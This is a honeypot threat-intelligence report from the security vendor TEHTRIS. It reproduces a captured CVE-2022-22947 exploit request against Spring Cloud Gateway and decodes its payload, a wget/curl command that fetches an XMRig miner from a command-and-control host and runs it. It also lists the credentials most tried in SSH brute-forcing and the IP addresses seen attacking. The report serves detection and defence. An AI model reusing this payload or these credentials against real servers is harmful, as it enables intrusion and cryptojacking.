TEHTRIS believes in creating cyber threat intelligence based on empiric observations of what is happening in the cyberworld. To do so, we deployed a large network of honeypots – equipped with TEHTRIS solutions, and our team analyses logs collected in the XDR Platform.
Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adjust the cybersecurity posture and detect low signals for further malicious activities.
Check out our previous report here.
CVE-2022-22947 EXPLOIT ATTEMPTS
We have observed CVE-2022-22947 (CVSSv3: 10) exploit attempts on our honeypots network. This CVE affects Spring Cloud Gateway applications, which are vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed and unsecured.
On the 26th and the 27th of August, the US IP address 185.207.250[.]115, hosted by AS51167 (Contabo GmbH) and known from public databases for being malicious, targeted our honeypots on port TCP/80. The devices affected are European honeypots hosted in the following countries: Spain, France, Estonia, Netherlands, Czech Republic, Finland, Portugal, Belgium, Ireland, Italy, and Poland.
Here is an example of the corresponding URL captured by our honeypot:
POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
User-Agent: Custom-HttpClient { "id": "AzMtdFlkrml", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(java.util.Base64.getDecoder().decode(\"cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht\"))).getInputStream()))}" } }], "uri": "http://example.com" }
This request exploits CVE-2022-22947 and execute a base64 encoded command on the victim.
The decoded command downloads an Xmrig cryptocurrency miner and executes it :
pkill -9 .foxm; cd /tmp; wget http[:]//185.225.75[.]242/download/xmrig.x86_64; curl -O http[:]//185.225.75[.]242/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm
This C2 (command & control) Dutch IP address 185.225.75[.]242 is hosted by AS211252 Delis LLC and known from VirusTotal community as it is referred for SSH credential attacks and linked to a miner.
IoCs
- 185.207.250[.]115
- 185.225.75[.]242
SSH services targeted – August trends
For the month of August 2023, we have observed the following trends regarding malicious activities targeting SSH services on our worldwide honeypots network.
Top 10 credentials tested by threat actors:
Login | Password |
345gs5662d34 | 345gs5662d34 |
admin | admin |
0 | 0 |
ubnt | ubnt |
root | password |
root | root |
admin | admin123 |
factory | factory |
3comcso | RIP000 |
cameras | cameras |
Top 10 of the most malicious IP addresses (all known from public databases):
- 193.105.134[.]95
- 185.246.128[.]133
- 218.92.0[.]119
- 218.92.0[.]120
- 218.92.0[.]123
- 185.224.128[.]141
- 185.224.128[.]142
- 180.101.88[.]234
- 180.101.88[.]249
- 180.101.88[.]223
Top ports/protocols targeted by threat actors – August 2023
Protocol | Port | % |
TCP | 445 | 18.833% |
TCP | 22 | 12.43% |
TCP | 80 | 6.273% |
TCP | 23 | 5.598% |
TCP | 6379 | 1.546% |
TCP | 443 | 1.22% |
UDP | 12522 | 1.166% |
TCP | 3389 | 0.964% |
UDP | 5060 | 0.641% |
TCP | 8443 | 0.508% |
Top 10 most exploited CVE – August 2023
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
CVE-2023-34362 EXPLOIT ATTEMPTS
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.